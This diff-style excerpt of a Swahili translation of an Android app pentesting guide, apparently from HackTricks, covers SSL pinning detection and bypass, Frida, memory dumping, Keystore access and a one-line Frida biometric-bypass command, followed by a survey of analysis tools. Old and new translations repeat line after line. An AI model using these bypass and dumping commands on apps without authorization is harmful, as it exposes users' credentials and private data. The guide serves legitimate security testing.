Ikiwa **Flutter** inatumika, lazima ufuate maelekezo katika [**this page**](flutter.md). Hii ni kwa sababu, kuongeza tu certificate kwenye store haitafanya kazi kwani Flutter ina orodha yake ya CA zinazokubalika.
#### Static detection of SSL/TLS pinning
Kabla ya kujaribu runtime bypasses, chora haraka mahali pinning inatekelezwa ndani ya APK. Ugunduzi wa static utakusaidia kupanga hooks/patches na kuzingatia njia sahihi za msimbo.
Kabla ya kujaribu runtime bypasses, panga haraka mahali pinning inatekelezwa ndani ya APK. Ugunduzi wa static utakusaidia kupanga hooks/patches na kuzingatia code paths sahihi.
Tool: SSLPinDetect
- Open-source static-analysis utility ambayo inadecompile APK hadi Smali (kwa apktool) na inascan kwa curated regex patterns za implementations za SSL/TLS pinning.
- Inaripoti path kamili ya faili, nambari ya mstari, na kipande cha msimbo kwa kila match.
- Inashughulikia frameworks zinazotumika na code paths maalum: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, and Network Security Config XML pins.
- Open-source static-analysis utility that decompiles the APK to Smali (via apktool) and scans for curated regex patterns of SSL/TLS pinning implementations.
- Reports exact file path, line number, and a code snippet for each match.
- Covers common frameworks and custom code paths: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, and Network Security Config XML pins.
Install
- Prereqs: Python >= 3.8, Java on PATH, apktool
@ -455,8 +456,8 @@ python sslpindetect.py -f app.apk -a apktool.jar
# Verbose (timings + per-match path:line + snippet)
python sslpindetect.py -a apktool_2.11.0.jar -f sample/app-release.apk -v
```
Mfano wa kanuni za pattern (JSON)
Tumia au ongeza signatures ili kugundua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na scan at scale.
Mifano ya kanuni za pattern (JSON)
Tumia au ongeza signatures ili kugundua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na kufanya scan kwa kiwango kikubwa.
```json
{
"OkHttp Certificate Pinning": [
@ -471,20 +472,20 @@ Tumia au ongeza signatures ili kugundua proprietary/custom pinning styles. Unawe
}
```
Notes and tips
- Fast scanning on large apps via multi-threading and memory-mapped I/O; pre-compiled regex reduces overhead/false positives.
- Skanning ya haraka kwenye apps kubwa kwa kutumia multi-threading na memory-mapped I/O; regex zilizotanguliwa hupunguza mzigo/false positives.
- Pattern collection: https://github.com/aancw/smali-sslpin-patterns
- Typical detection targets to triage next:
- OkHttp: matumizi ya CertificatePinner, setCertificatePinner, marejeo ya package okhttp3/okhttp
- TrustManagers maalum: javax.net.ssl.X509TrustManager, overrides za checkServerTrusted
- SSL contexts maalum: SSLContext.getInstance + SSLContext.init na managers maalum
- Declarative pins katika res/xml network security config na marejeo kwenye manifest
- Tumia maeneo yaliyoendana kupanga Frida hooks, static patches, au mapitio ya config kabla ya dynamic testing.
- Lengo za kawaida za kugundua za kutathmini kisha:
- OkHttp: CertificatePinner usage, setCertificatePinner, okhttp3/okhttp package references
- Custom TrustManagers: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
- Custom SSL contexts: SSLContext.getInstance + SSLContext.init with custom managers
- Declarative pins in res/xml network security config and manifest references
- Tumia maeneo yaliyolingana kupanga Frida hooks, static patches, au ukaguzi wa config kabla ya majaribio ya dynamic.
#### Kuvuka SSL Pinning
#### Bypassing SSL Pinning
When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS traffic. Various methods are available for this purpose:
When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS traffic. Mbinu mbalimbali zinapatikana kwa madhumuni haya:
- Automatically **modify** the **apk** to **bypass** SSLPinning with [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). The best pro of this option, is that you won't need root to bypass the SSL Pinning, but you will need to delete the application and reinstall the new one, and this won't always work.
- You could use **Frida** (discussed below) to bypass this protection. Here you have a guide to use Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
@ -494,13 +495,13 @@ When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS
#### Looking for Common Web Vulnerabilities
Ni muhimu pia kutafuta udhaifu wa kawaida wa wavuti ndani ya application. Maelezo ya kina juu ya utambuzi na kupunguza udhaifu huu yapo nje ya muhtasari huu lakini yameelezewa kwa kina mahali pengine.
Ni muhimu pia kutafuta udhaifu wa kawaida wa web ndani ya application. Maelezo ya kina juu ya kutambua na kupunguza udhaifu haya yapo mahali pengine na hayajumuishwi hapa.
### Frida
[Frida](https://www.frida.re) is a dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.\
**You can access running application and hook methods on run time to change the behaviour, change values, extract values, run different code...**\
If you want to pentest Android applications you need to know how to use Frida.
[Frida](https://www.frida.re) ni dynamic instrumentation toolkit kwa developers, reverse-engineers, na watafiti wa usalama.\
**Unaweza kufikia application inayokimbia na kuhook methods wakati wa run time ili kubadilisha tabia, kubadilisha thamani, kutoa thamani, kuendesha code tofauti...**\
Kama unataka pentest Android applications unahitaji kujua jinsi ya kutumia Frida.
- Learn how to use Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Some "GUI" for actions with Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
@ -516,7 +517,7 @@ android-anti-instrumentation-and-ssl-pinning-bypass.md
### **Dump Memory - Fridump**
Angalia kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi kama passwords au mnemonics.
Kagua kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi, kama passwords au mnemonics.
Using [**Fridump3**](https://github.com/rootbsd/fridump3) you can dump the memory of the app with:
```bash
@ -527,63 +528,63 @@ python3 fridump3.py -u <PID>
frida-ps -Uai
python3 fridump3.py -u "<Name>"
```
Hii itadump kumbukumbu katika folda ./dump, na huko unaweza kutumia grep kwa kitu kama:
Hii itadump memory kwenye folda ./dump, na hapo unaweza grep kwa kitu kama:
```bash
strings * | grep -E "^[a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+$"
```
### **Data nyeti katika Keystore**
Katika Android Keystore ni mahali bora pa kuhifadhi data nyeti, hata hivyo, kwa idhini za kutosha bado ni **inawezekana kuifikia**. Kwa kuwa programu zinaelekea kuhifadhi hapa **data nyeti kwa maandishi wazi**, pentests zinapaswa kuikagua kwa root user au mtu mwenye ufikiaji wa kimwili wa kifaa ambaye anaweza kuiba data hii.
Katika Android, Keystore ni mahali bora pa kuhifadhi data nyeti, hata hivyo, kwa ruhusa za kutosha bado ni **inawezekana kuifikia**. Kwa kuwa applications huwa zinaweka hapa **sensitive data in clear text**, pentests zinapaswa kukagua hili kwa kutumia root user, kwani mtu mwenye ufikiaji wa kimwili kwa kifaa anaweza kuiba data hii.
Hata kama app ilihifadhi data katika keystore, data inapaswa kusimbwa.
Hata kama app iliweka data katika Keystore, data inapaswa kusimbwa.
Ili kufikia data ndani ya keystore unaweza kutumia Frida script hii: https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js
Ili kufikia data ndani ya keystore unaweza kutumia Frida script: [https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js](https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js)
```bash
frida -U -f com.example.app -l frida-scripts/tracer-cipher.js
```
### **Fingerprint/Biometrics Bypass**
Kutumia Frida script ifuatayo, inaweza kuwa inawezekana **bypass fingerprint authentication** ambayo programu za Android zinaweza kufanya ili **kulinda maeneo fulani nyeti:**
Kutumia script ifuatayo ya Frida kunaweza kumwezesha **bypass fingerprint authentication** ambayo Android applications zinaweza kutumia ili **kulinda maeneo fulani nyeti:**
```bash
frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f <app.package>
```
### **Picha za Mandharinyuma**
### **Picha za Usuli**
Unapoweka programu kwenye mandharinyuma, Android huhifadhi **snapshot ya programu**, hivyo inaporejeshwa kwenye foreground inaanza kupakia picha kabla ya programu ili ionekane kama ilipakuliwa haraka.
Unapoweka programu kwenye usuli, Android huhifadhi **snapshot ya programu** ili inaporekebishwa kurudi kwenye mbele (foreground) inaanza kupakia picha kabla ya programu, hivyo inaonekana kama programu ilipakiwa kwa haraka.
Hata hivyo, ikiwa snapshot hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa snapshot anaweza **kuiba hizo taarifa** (kumbuka kwamba unahitaji root ili kuzifikia).
Hata hivyo, ikiwa snapshot hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa snapshot anaweza **kuiba taarifa hiyo** (kumbuka unahitaji root ili kuifikia).
Snapshots kawaida huhifadhiwa karibu: **`/data/system_ce/0/snapshots`**
Snapshots hizi kwa kawaida huhifadhiwa hapa: **`/data/system_ce/0/snapshots`**
Android inatoa njia ya **kuzuia kuchukuliwa kwa screenshot kwa kuweka parameter ya layout FLAG_SECURE**. Kwa kutumia flag hii, yaliyomo kwenye dirisha yanachukuliwa kuwa salama, na hivyo kuzuia kuonekana kwenye screenshots au kutazamwa kwenye displays zisizo-salama.
Android inatoa njia ya **kuzuia kunyakuliwa picha za skrini kwa kuweka parametro ya layout FLAG_SECURE**. Kwa kutumia flag hii, yaliyomo kwenye dirisha yanachukuliwa kuwa salama, na kuzuia kuonekana kwenye picha za skrini au kuonyeshwa kwenye skrini zisizo salama.
```bash
getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
```
### **Android Application Analyzer**
### **Mchambuzi wa Programu za Android**
Zana hii inaweza kukusaidia kusimamia zana tofauti wakati wa uchambuzi wa kimitambo (dynamic analysis): [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
Zana hii inaweza kukusaidia kusimamia zana tofauti wakati wa dynamic analysis: [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
### Intent Injection
Waundaji mara nyingi huunda komponenti za proxy kama activities, services, na broadcast receivers ambazo hushughulikia Intent hizi na kuzipitisha kwa njia kama `startActivity(...)` au `sendBroadcast(...)`, jambo ambalo linaweza kuwa hatari.
Waendelezaji mara nyingi huunda proxy components kama activities, services, na broadcast receivers ambazo zinashughulikia Intent hizi na kuzipeleka kwa methods kama `startActivity(...)` au `sendBroadcast(...)`, ambazo zinaweza kuwa hatarishi.
Hatari iko katika kuruhusu wadukuzi kuchochea non-exported app components au kupata sensitive content providers kwa kuelekeza vibaya Intent hizi. Mfano wa kuzingatia ni `WebView` kubadilisha URLs kuwa vitu vya `Intent` kupitia `Intent.parseUri(...)` na kisha kuvitekeleza, jambo ambalo linaweza kusababisha malicious Intent injections.
Hatari iko katika kuruhusu washambuliaji kuanzisha components za app zisizokuwa exported au kupata content providers nyeti kwa kubeleza Intent hizi. Mfano unaojulikana ni component ya `WebView` kubadilisha URLs kuwa vitu vya `Intent` kupitia `Intent.parseUri(...)` kisha kuvitekeleza, jambo ambalo linaweza kusababisha intent zenye madhara.
### Hitimisho Muhimu
### Essential Takeaways
- **Intent Injection** ni sawa na tatizo la Open Redirect kwenye web.
- Udanganyifu unaohusisha kupitisha vitu vya `Intent` kama extras, ambavyo vinaweza kuelekezwa tena ili kutekeleza operesheni zisizo salama.
- Inaweza kufunua non-exported components na content providers kwa wadukuzi.
- U-badilishaji wa URL kuwa `Intent` katika `WebView` unaweza kuwezesha vitendo visivyokusudiwa.
- **Intent Injection** ni sawa na tatizo la Open Redirect la web.
- Maenendo yanahusisha kupitisha `Intent` objects kama extras, ambayo yanaweza kuelekezwa tena ili kutekeleza operesheni zisizo salama.
- Inaweza kufichua components zisizokuwa exported na content providers kwa washambuliaji.
- Ubadilishaji wa URL kuwa `Intent` katika `WebView` unaweza kurahisisha vitendo visivyokusudiwa.
### Android Client Side Injections and others
Huenda tayari unafahamu aina hizi za udhaifu kutoka kwenye Web. Lazima kuwa mwangalifu sana na udhaifu hivi katika programu ya Android:
Huenda unajua kuhusu aina hizi za vulnerabilities kutoka kwa Web. Lazima uwe mwangalifu hasa na vulnerabilities hizi katika application ya Android:
- **SQL Injection:** Wakati wa kushughulikia queries zinazobadilika au Content-Providers, hakikisha unatumia parameterized queries.
- **JavaScript Injection (XSS):** Hakikisha JavaScript na Plugin support imezimwa kwa WebViews yoyote (imezimwa kwa default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews zinafaa kuzuia access to the file system (imewezeshwa kwa default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: Katika kesi kadhaa programu ya android inapomaliza session cookie haifutwi au inaweza hata kuhifadhiwa kwenye disk
- **SQL Injection:** Unaposhughulika na dynamic queries au Content-Providers hakikisha unatumia parameterized queries.
- **JavaScript Injection (XSS):** Thibitisha kwamba support ya JavaScript na Plugin imezimwa kwa WebViews zote (imezimwa kwa default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews zinapaswa kuwa na ufikiaji wa file system uzimw (umewezeshwa kwa default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: Katika kesi kadhaa, wakati application ya Android inapo maliza session cookie haifutwi au inaweza hata kuhifadhiwa kwenye disk
- [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/index.html#cookies-flags)
---
@ -596,7 +597,7 @@ Huenda tayari unafahamu aina hizi za udhaifu kutoka kwenye Web. Lazima kuwa mwan
![](<../../images/image (866).png>)
**Vulnerability assessment of the application** using a nice web-based frontend. You can also perform dynamic analysis (but you need to prepare the environment).
**Tathmini ya udhaifu ya application** ikitumia frontend nzuri inayotegemea web. Unaweza pia kufanya dynamic analysis (lakini unahitaji kuandaa mazingira).
```bash
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
@ -604,43 +605,43 @@ docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
Notice that MobSF can analyse **Android**(apk)**, IOS**(ipa) **and Windows**(apx) applications (_Windows applications must be analyzed from a MobSF installed in a Windows host_).\
Also, if you create a **ZIP** file with the source code if an **Android** or an **IOS** app (go to the root folder of the application, select everything and create a ZIPfile), it will be able to analyse it also.
MobSF pia inakuwezesha kufanya **diff/Compare** analysis na kuunganishwa na **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuifungua: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, basi **hash** itakuwa **upload** badala ya faili.
MobSF pia inaruhusu kufanya **diff/Compare** ya analysis na kuunganisha **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuiwezesha: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, basi the **hash** itakuwa **upload** badala ya faili.
### Assisted Dynamic analysis with MobSF
### Uchambuzi wa Dynamic uliosaidiwa na MobSF
**MobSF** pia inaweza kuwa msaada mkubwa kwa ajili ya **dynamic analysis** kwenye **Android**, lakini katika kesi hiyo utahitaji kusanidi MobSF na **genymotion** kwenye host yako (VM au Docker hazitafanyi kazi). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
**MobSF** inaweza pia kuwa msaada mkubwa kwa ajili ya **dynamic analysis** katika **Android**, lakini katika kesi hiyo utahitaji kusanidi MobSF na **genymotion** kwenye host yako (VM au Docker hazitafanya kazi). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
The **MobSF dynamic analyser** inaweza:
- **Dump application data** (URLs, logs, clipboard, screenshots made by you, screenshots made by "**Exported Activity Tester**", emails, SQLite databases, XML files, and other created files). Yote haya hufanyika kiotomatiki isipokuwa kwa screenshots; unahitaji ku-bonyeza unapohitaji screenshot au unahitaji ku-bonyeza "**Exported Activity Tester**" ili kupata screenshots za activities zote zilizoexportiwa.
- **Dump application data** (URLs, logs, clipboard, screenshots made by you, screenshots made by "**Exported Activity Tester**", emails, SQLite databases, XML files, and other created files). Yote haya hufanywa kwa otomatiki isipokuwa kwa screenshots, unahitaji kubofya unapotaka screenshot au unahitaji kubofya "**Exported Activity Tester**" kupata screenshots za exported activities zote.
- Capture **HTTPS traffic**
- Use **Frida** to obtain **runtime** **information**
Kuanzia android **versions > 5**, itaanzisha **Frida** kiotomatiki na itaweka mipangilio ya **proxy** ya global ili **capture** traffic. Itachukua tu traffic kutoka kwa application inayochambuliwa.
Kuanzia android **versions > 5**, itaanza **Frida** kwa **automatic** na itaweka global **proxy** settings ili **capture** trafiki. Itakamata trafiki tu kutoka kwa application inayojaribiwa.
**Frida**
By default, it will also use some Frida Scripts to **bypass SSL pinning**, **root detection** and **debugger detection** and to **monitor interesting APIs**.\
MobSF pia inaweza **invoke exported activities**, grab **screenshots** of them and **save** them for the report.
Kwa default, itatumia pia baadhi ya Frida Scripts ili **bypass SSL pinning**, **root detection** na **debugger detection** na pia **monitor interesting APIs**.\
MobSF pia inaweza **invoke exported activities**, kuchukua **screenshots** za hizo activities na **save** kwa ajili ya report.
To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values (this will appear after pressing "Start Instrumentation").\
MobSF pia inakuwezesha kupakia **Frida scripts** zako mwenyewe (kama utatumia function `send()` kutuma matokeo ya Frida scripts zako kwa MobSF). Pia ina **several pre-written scripts** unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu, bonyeza "**Load**" na bonyeza "**Start Instrumentation**" (utaweza kuona logs za script hizo ndani ya "**Frida Live Logs**").
Ili kuanza dynamic testing bonyeza kitufe kijani: "**Start Instrumentation**". Bonyeza "**Frida Live Logs**" ili kuona logs zinazozalishwa na Frida scripts na "**Live API Monitor**" kuona mikao yote ya invocation kwa hooked methods, arguments zilizopita na values zilizorejeshwa (hii itaonekana baada ya kubofya "Start Instrumentation").\
MobSF pia inakuwezesha kupakia **Frida scripts** zako mwenyewe (to send the results of your Friday scripts to MobSF use the function `send()`). Ina pia **several pre-written scripts** unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu, bonyeza "**Load**" na kisha bonyeza "**Start Instrumentation**" (utaweza kuona logs za scripts hizo ndani ya "**Frida Live Logs**").
![](<../../images/image (419).png>)
Zaidi ya hayo, una baadhi ya Auxiliary Frida functionalities:
Zaidi ya hayo, una baadhi ya functionalities za ziada za Frida:
- **Enumerate Loaded Classes**: It will print all the loaded classes
- **Capture Strings**: It will print all the capture strings while using the application (super noisy)
- **Capture String Comparisons**: Could be very useful. It will **show the 2 strings being compared** and if the result was True or False.
- **Enumerate Class Methods**: Put the class name (like "java.io.File") and it will print all the methods of the class.
- **Search Class Pattern**: Search classes by pattern
- **Trace Class Methods**: **Trace** a **whole class** (see inputs and outputs of all methods of th class). Remember that by default MobSF traces several interesting Android Api methods.
- **Enumerate Loaded Classes**: Itaonyesha madarasa yote yaliyo loaded
- **Capture Strings**: Itaonyesha strings zote zinazokamatwa wakati wa kutumia application (inazalisha kelele nyingi)
- **Capture String Comparisons**: Inaweza kuwa muhimu sana. Itaonyesha **strings 2 zinazolinganishwa** na kama matokeo yalikuwa True au False.
- **Enumerate Class Methods**: Weka jina la class (kama "java.io.File") na itaonyesha methods zote za class hiyo.
- **Search Class Pattern**: Tafuta classes kwa pattern
- **Trace Class Methods**: **Trace** class nzima (ona inputs na outputs za methods zote za class). Kumbuka kwamba kwa default MobSF hufuatilia methods kadhaa zenye umuhimu za Android Api.
Mara utakapochagua module ya ziada unayotaka kutumia unahitaji kubonyeza "**Start Intrumentation**" na utaona matokeo yote katika "**Frida Live Logs**".
Mara tu unapochagua module ya ziada unayotaka kutumia unahitaji kubofya "**Start Intrumentation**" na utaona outputs zote katika "**Frida Live Logs**".
**Shell**
Mobsf pia inakuleta shell yenye baadhi ya amri za **adb**, **MobSF commands**, na amri za kawaida za **shell** kwenye sehemu ya chini ya ukurasa wa dynamic analysis. Baadhi ya amri za kuvutia:
Mobsf pia inakuleta shell yenye amri za **adb**, **MobSF commands**, na amri za kawaida za **shell** chini ya ukurasa wa dynamic analysis. Baadhi ya amri zinazovutia:
```bash
help
shell ls
@ -649,24 +650,24 @@ exported_activities
services
receivers
```
**Zana za HTTP**
**HTTP tools**
Wakati traffic ya http inapokamatwa unaweza kuona mtazamo mbaya wa traffic iliyokamatwa kwenye kitufe cha "**HTTP(S) Traffic**" au mtazamo mzuri kwenye kitufe cha kijani "**Start HTTPTools**". Kutoka chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\
Ili kufanya hivyo, _washa Burp -->_ _zima Intercept --> katika MobSB HTTPTools chagua request_ --> bonyeza "**Send to Fuzzer**" --> _chagua anwani ya proxy_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Wakati trafiki ya HTTP inapokamatwa unaweza kuona muonekano mbaya wa trafiki iliyokamatwa kwenye kitufe "**HTTP(S) Traffic**" au muonekano mzuri kwenye kitufe kijani "**Start HTTPTools**". Kutoka chaguo la pili, unaweza **send** the **captured requests** to **proxies** kama Burp au Owasp ZAP.\
Ili kufanya hivyo, _power on Burp -->_ _turn off Intercept --> in MobSB HTTPTools select the request_ --> bonyeza "**Send to Fuzzer**" --> _select the proxy address_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Mara tu umemaliza dynamic analysis na MobSF unaweza kubonyeza "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta udhaifu.
Mara baada ya kumaliza the dynamic analysis na MobSF unaweza kubonyeza "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta udhaifu.
> [!TIP]
> Baada ya kufanya dynamic analysis na MobSF mipangilio ya proxy inaweza kuwa imepangwa vibaya na huwezi kuirekebisha kutoka GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
> Baada ya kufanya the dynamic analysis na MobSF mipangilio ya proxy inaweza kuwa imepangwa vibaya na huwezi kuirekebisha kutoka GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
>
> ```
> adb shell settings put global http_proxy :0
> ```
### Assisted Dynamic Analysis with Inspeckage
### Uchambuzi wa Dynamic uliosaidiwa na Inspeckage
Unaweza kupata zana kutoka [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
Zana hii itatumia baadhi ya **Hooks** kukufahamisha **nini kinaendelea ndani ya application** wakati unafanya **dynamic analysis**.
Zana hii itatumia baadhi ya **Hooks** kukujulisha **kinachotokea katika application** wakati unafanya a **dynamic analysis**.
### [Yaazhini](https://www.vegabird.com/yaazhini/)
@ -676,7 +677,7 @@ Hii ni **zana nzuri ya kufanya static analysis kwa GUI**
### [Qark](https://github.com/linkedin/qark)
Zana hii imeundwa kutafuta maeneo mbalimbali ya **security related Android application vulnerabilities**, iwe katika **source code** au **packaged APKs**. Zana pia ina uwezo wa **kuunda a "Proof-of-Concept" deployable APK** na **ADB commands**, ili kutekeleza baadhi ya vulnerabilities zilizopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani.
Zana hii imeundwa kutafuta udhaifu mbalimbali zinazohusiana na usalama za Android application, iwe katika **source code** au **packaged APKs**. Zana pia ina uwezo wa kuunda "Proof-of-Concept" deployable APK na **ADB commands**, ili kutumia baadhi ya udhaifu uliopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani.
```bash
pip3 install --user qark # --user is only needed if not using a virtualenv
qark --apk path/to/my.apk
@ -685,20 +686,20 @@ qark --java path/to/specific/java/file.java
```
### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
- Inaonyesha faili zote zilizochimbuliwa kwa rejea rahisi
- Inafanya decompile moja kwa moja ya APK files hadi Java na Smali format
- Huchambua AndroidManifest.xml kwa vulnerabilities za kawaida na tabia
- Static source code analysis kwa vulnerabilities za kawaida na tabia
- Inaonyesha faili zote zilizotolewa kwa marejeo rahisi
- Hu-decompile faili za APK moja kwa moja hadi muundo wa Java na Smali
- Huchambua AndroidManifest.xml kwa ajili ya udhaifu na tabia za kawaida
- Uchambuzi wa static wa source code kwa ajili ya udhaifu na tabia za kawaida
- Taarifa za kifaa
- na mengine mengi
- na zaidi
```bash
reverse-apk relative/path/to/APP.apk
```
### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
SUPER ni programu ya mstari wa amri inayoweza kutumika kwenye Windows, MacOS X na Linux, ambayo inachambua faili za _.apk_ kwa kutafuta udhaifu. Inafanya hivyo kwa kufungua APKs na kutumia mfululizo wa sheria kugundua udhaifu hizo.
SUPER ni programu ya command-line inayoweza kutumika kwenye Windows, MacOS X na Linux, inayochambua faili za _.apk_ kwa kutafuta vulnerabilities. Inafanya hivyo kwa kuzifungua APKs na kutumia mfululizo wa sheria kugundua vulnerabilities hizo.
Sheria zote ziko kwenye faili la `rules.json`, na kila kampuni au mtapimaji anaweza kuunda sheria zake ili kuchambua wanachohitaji.
Sheria zote ziko katika faili ya `rules.json`, na kila kampuni au mtapimaji anaweza kuunda sheria zake za kuchambua wanazohitaji.
Pakua binaries za hivi karibuni kutoka kwenye [download page](https://superanalyzer.rocks/download.html)
```
@ -708,9 +709,9 @@ super-analyzer {apk_file}
![](<../../images/image (297).png>)
StaCoAn ni zana ya **crossplatform** inayowasaidia waendelezaji, bugbounty hunters na ethical hackers wanaofanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye programu za rununu.
StaCoAn ni zana ya **crossplatform** inayowawezesha waendelezaji, bugbounty hunters na ethical hackers kufanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye programu za rununu.
Dhana ni kwamba unaburuta na kuachia (drag and drop) faili ya programu yako ya rununu (faili ya .apk au .ipa) kwenye programu ya StaCoAn na itatengeneza ripoti ya kuona na inayobebeka kwa ajili yako. Unaweza kurekebisha settings na wordlists kupata uzoefu uliobinafsishwa.
Dhana ni kwamba unaburuta na kuachia faili ya programu yako ya rununu (faili .apk au .ipa) kwenye application ya StaCoAn na itatengeneza ripoti ya kuona na inayoweza kubebwa kwako. Unaweza kubadilisha mipangilio na wordlists ili kupata uzoefu uliyobinafsishwa.
Pakua[ latest release](https://github.com/vincentcox/StaCoAn/releases):
```
@ -718,7 +719,7 @@ Pakua[ latest release](https://github.com/vincentcox/StaCoAn/releases):
```
### [AndroBugs](https://github.com/AndroBugs/AndroBugs_Framework)
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kutafuta udhaifu za usalama zinazowezekana katika programu za Android.\
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kugundua udhaifu za usalama zinazowezekana katika programu za Android.\
[Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases)
```
python androbugs.py -f [APK file]
@ -726,11 +727,11 @@ androbugs.exe -f [APK file]
```
### [Androwarn](https://github.com/maaaaz/androwarn)
**Androwarn** ni zana yenye lengo kuu la kugundua na kuwaonya watumiaji kuhusu tabia hatari zinazoweza kutendeka katika programu ya Android.
**Androwarn** ni zana ambayo lengo lake kuu ni kugundua na kuwaonya mtumiaji kuhusu tabia hatari zinazoweza kufanywa na Android application.
Ugunduzi unafanywa kwa kutumia **static analysis** ya Dalvik bytecode ya programu, iliyoonyeshwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Ugundaji hufanywa kwa **static analysis** ya application's Dalvik bytecode, inayowakilishwa kama **Smali**, kwa kutumia maktaba [`androguard`](https://github.com/androguard/androguard).
Zana hii inatafuta **tabia za kawaida za programu "mbaya"** kama: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
Zana hii inatafuta **common behavior of "bad" applications** like: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
```
python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
```
@ -738,72 +739,72 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
![](<../../images/image (595).png>)
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. Ni zana inayoweka pamoja zana zinazotumika sana za reverse engineering na analysis za mobile application, kusaidia katika kujaribu programu za rununu dhidi ya tishio za usalama za OWASP. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa waendelezaji wa programu za rununu na wataalamu wa usalama.
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. Ni chombo kinachoongeza pamoja zana zinazotumika mara kwa mara za mobile application reverse engineering na analysis, kusaidia katika kujaribu mobile applications dhidi ya vitisho vya OWASP mobile security. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa watengenezaji wa mobile application na wataalamu wa usalama.
Ina uwezo wa:
- Extract Java and Smali code using different tools
